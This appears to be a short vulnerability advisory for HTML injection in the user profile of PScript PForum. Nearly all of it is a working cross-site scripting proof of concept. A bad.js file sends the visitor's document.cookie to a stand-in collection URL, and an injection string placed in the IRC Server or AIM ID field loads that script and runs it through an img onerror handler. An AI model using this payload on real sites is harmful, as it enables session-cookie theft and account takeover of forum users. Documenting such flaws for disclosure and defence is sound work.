|
PScript PForum User Profile HTML Injection Vulnerability
There is no exploit required. The following example is available: Create a Javascript file and save it as bad.js (your domain name is in this case example.com). The file contains the following code: // bad.js function b() { location.href='example.org/compute_stolen_data.ext?'+document.cookie; } Edit your profile and enter the following line into the IRC Server or AIM ID Input Box. The string have to be shorter then 100 characters. // Input Box (without line break) "><script src=http://example.com/bad.js></script> <img height=0 width=0 src=foo onerror=b(); > |
|
|
Privacy Statement |